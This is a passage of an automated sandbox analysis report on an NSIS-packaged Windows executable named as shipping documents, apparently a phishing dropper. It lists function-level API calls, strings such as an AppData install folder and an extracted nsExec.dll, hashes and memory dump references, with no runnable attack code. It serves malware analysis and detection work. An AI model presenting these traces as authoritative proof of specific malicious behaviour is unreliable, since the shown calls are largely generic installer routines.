CreateThread.KERNELBASE(00000000,00000000,Function_00005864,00000000), ref: 00404D00
CloseHandle.KERNELBASE(00000000), ref: 00404D07
ShowWindow.USER32(00000008), ref: 00404D82
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DC1
CreatePopupMenu.USER32 ref: 00404DD5
AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DF1
GetWindowRect.USER32(?,?), ref: 00404E0F
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E31
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E60
OpenClipboard.USER32(00000000), ref: 00404E70
EmptyClipboard.USER32 ref: 00404E76
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E82
GlobalLock.KERNEL32(00000000), ref: 00404E8F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EAB
GlobalUnlock.KERNEL32(?), ref: 00404ECE
SetClipboardData.USER32(0000000D,?), ref: 00404ED9
CloseClipboard.USER32 ref: 00404EDF

Strings

perchlorination: Installing, xrefs: 00404E43

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
String ID: perchlorination: Installing
API String ID: 2901622961-2388396748
Opcode ID: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction ID: b8a9fdf254180bfaf0004a99ba51f40fd9d2112bd445e4f5698f4cfe216f0b8a
Opcode Fuzzy Hash: 7ec54c2a3a868982bb039b13d8fa38caacdb03059396a995cf16b9d83891ef8f
Instruction Fuzzy Hash: 45A1BEB1604304BBE720AF61DD89F9B7FA9FFC4754F00092AF645A62E1C7789840CB69

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406638: lstrlenW.KERNEL32(004305C0,00000000,004305C0,004305C0,00000000,?,?,0040673B,?,00000000,75923420,?), ref: 0040668C
Part of subcall function 00406638: GetFileAttributesW.KERNEL32(004305C0,004305C0), ref: 0040669D

DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406745
lstrcatW.KERNEL32(0042FDC0,\*.*,0042FDC0,?,00000000,?,00000000,75923420,?), ref: 00406797
lstrcatW.KERNEL32(?,004092B0,?,0042FDC0,?,00000000,?,00000000,75923420,?), ref: 004067B8
lstrlenW.KERNEL32(?), ref: 004067BB
FindFirstFileW.KERNEL32(0042FDC0,?), ref: 004067D2
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406863
FindClose.KERNEL32(00000000), ref: 00406875

Strings

\*.*, xrefs: 0040678D

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction ID: dccc3e871a12a5ab9d695c44a96518fee9cafe6829caada924bdb8552f231abd
Opcode Fuzzy Hash: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction Fuzzy Hash: 084106322067116AD7207B259C49A6B73A8EF41318F16893FF943F21D1E73C8D6586AF

Function 004065CF Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,004321C0,00000000,0040667C,004305C0), ref: 004065DA
FindClose.KERNEL32(00000000), ref: 004065E6

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction ID: 9bce445b90ad5ff1b83c175b3b927286731ee1a5929a82a3f0dae3cb9bd988e9
Opcode Fuzzy Hash: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction Fuzzy Hash: 64D012756051316BD70057787E0CC8B7F699F05330F158A36B066F11F5D7748C6196AC

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FD1
ShowWindow.USER32(?), ref: 00404FFB
GetWindowLongW.USER32(?,000000F0), ref: 0040500C
ShowWindow.USER32(?,00000004), ref: 00405028
GetDlgItem.USER32(?,00000001), ref: 0040514F
GetDlgItem.USER32(?,00000002), ref: 00405159
SetClassLongW.USER32(?,000000F2,?), ref: 00405173
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051C1
GetDlgItem.USER32(?,00000003), ref: 00405270
ShowWindow.USER32(00000000,?), ref: 00405299
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052AD
KiUserCallbackDispatcher.NTDLL(?), ref: 004052C1
EnableWindow.USER32(?), ref: 004052D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052F0
EnableMenuItem.USER32(00000000), ref: 004052F7
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405308
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040531F
lstrlenW.KERNEL32(perchlorination: Installing,?,perchlorination: Installing,00000000), ref: 00405350

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070

SetWindowTextW.USER32(?,perchlorination: Installing), ref: 00405368

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 004053B0
CreateDialogParamW.USER32(?,?,-00435A20), ref: 004053E4

Part of subcall function 0040551A: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534

GetDlgItem.USER32(?,000003FA), ref: 0040540D
GetWindowRect.USER32(00000000), ref: 00405414
ScreenToClient.USER32(?,?), ref: 00405420
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405439
ShowWindow.USER32(00000008,?,00000000), ref: 00405458

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

ShowWindow.USER32(?,0000000A), ref: 0040549E

Strings

perchlorination: Installing, xrefs: 0040533E, 0040534B, 00405362

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: perchlorination: Installing
API String ID: 162979904-2388396748
Opcode ID: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction ID: ac036152562477463cd4b906f759de02b60d47e3f23a7c23d24dd845f532a47a
Opcode Fuzzy Hash: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction Fuzzy Hash: 39D19071A00A11BFDB206F61ED49A6B7BA8FB84355F00053AF506B62F1C7389851DF9D

Function 00405A3E Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910

lstrcatW.KERNEL32(1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405AC1
lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000,00000002,00000000), ref: 00405B45
lstrcmpiW.KERNEL32(-000000FC,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000), ref: 00405B5A
GetFileAttributesW.KERNEL32(Exec), ref: 00405B65
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer), ref: 00405BAE

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

RegisterClassW.USER32(004349A0), ref: 00405BF3
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C0A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C3F
ShowWindow.USER32(00000005,00000000), ref: 00405C71
GetClassInfoW.USER32(00000000,RichEdit20W,004349A0), ref: 00405C9C
GetClassInfoW.USER32(00000000,RichEdit,004349A0), ref: 00405CA9
RegisterClassW.USER32(004349A0), ref: 00405CB6
DialogBoxParamW.USER32(?,00000000,00404F92,00000000), ref: 00405CD1

Strings

perchlorination: Installing, xrefs: 00405A71, 00405A7C, 00405A9C, 00405AA6, 00405ABB
Exec, xrefs: 00405B06, 00405B0F, 00405B20, 00405B74, 00405B7A
RichEdit20W, xrefs: 00405C96, 00405CAC
.exe, xrefs: 00405B54
1033, xrefs: 00405A61, 00405A85, 00405ABC
RichEd32, xrefs: 00405C85
Control Panel\Desktop\ResourceLocale, xrefs: 00405A7E
.DEFAULT\Control Panel\International, xrefs: 00405AAC
RichEdit, xrefs: 00405CA3
_Nb, xrefs: 00405BD2, 00405C39
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 00405AD0, 00405AE2, 00405B81, 00405B87, 00405B97
RichEd20, xrefs: 00405C77

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$perchlorination: Installing
API String ID: 1975747703-1168572951
Opcode ID: 3bc0d0cabe1863129078f0feabcaa81f7bf88df128255f6ebf80579141351188
Instruction ID: 6fb6b78dff8dcbba7a007941f02a836e4a1cfbcf653c0408c2f56a309db5e394
Opcode Fuzzy Hash: 3bc0d0cabe1863129078f0feabcaa81f7bf88df128255f6ebf80579141351188
Instruction Fuzzy Hash: 7061E4B1201605BEE610AB75AD45F7B36ACEF80358F50453BF901B61E2DB79AC108F6D

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,00000000,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Exec,40000000,00000001,Exec,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(00000000), ref: 00401A61
lstrcatW.KERNEL32(Exec,00000000,Exec,000000E9), ref: 00401A82

Strings

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 00401798, 0040190E
Exec, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Exec
API String ID: 3895412863-2909577899
Opcode ID: 908e177244b311fa2ecad2bc2786d6a07ecd1f04af5a848f628353bc50e42be3
Instruction ID: 8c1cf908ae02b995a3a41f7ffac76b054db7533a66b8d62ade7f549c41348504
Opcode Fuzzy Hash: 908e177244b311fa2ecad2bc2786d6a07ecd1f04af5a848f628353bc50e42be3
Instruction Fuzzy Hash: 38D10870604301BBD710AF26CD85E2B76A8EF85359F204A3FF452B62E1D77CD9019A6E

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403400
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,00000400,?,?,?,?,?), ref: 0040341C

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 00403466
GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 004035C0

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033F3
Error launching installer, xrefs: 0040343C
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 00403452
Inst, xrefs: 004034DA
soft, xrefs: 004034E4
8uA, xrefs: 0040356E
Null, xrefs: 004034EE
C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe, xrefs: 0040340B, 00403415, 00403429, 00403446
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403640

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: 8uA$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1108000592
Opcode ID: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction ID: 38a706e546d8de2da2def33f7086105d1948706aa1bd56b4a23ee49e5693a868
Opcode Fuzzy Hash: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction Fuzzy Hash: 0A51B171504310BFD720AF21DD81B1B7BA8AB4471AF10093FFA55B72E1C7789A848BAD

Function 00405EBA Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 00405FE4

Part of subcall function 00406B1A: lstrcpynW.KERNEL32(?,?,00000400,00403871,00434A00,NSIS Error), ref: 00406B27

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE

GetWindowsDirectoryW.KERNEL32(Exec,00000400,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,?,?,?,00000000,?,?), ref: 00405FF7
lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
lstrlenW.KERNEL32(Exec,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,?,?,?,00000000,?,?), ref: 004060CA

Strings

Exec, xrefs: 00405EDC, 00405FAA, 00405FCE, 00405FE3, 00405FF6, 00406009, 00406036, 0040606F, 00406076, 00406092, 004060A5, 004060B3, 004060C3, 004060C9, 004060F0, 0040610C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405FAF
Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00405F15
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040606A

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

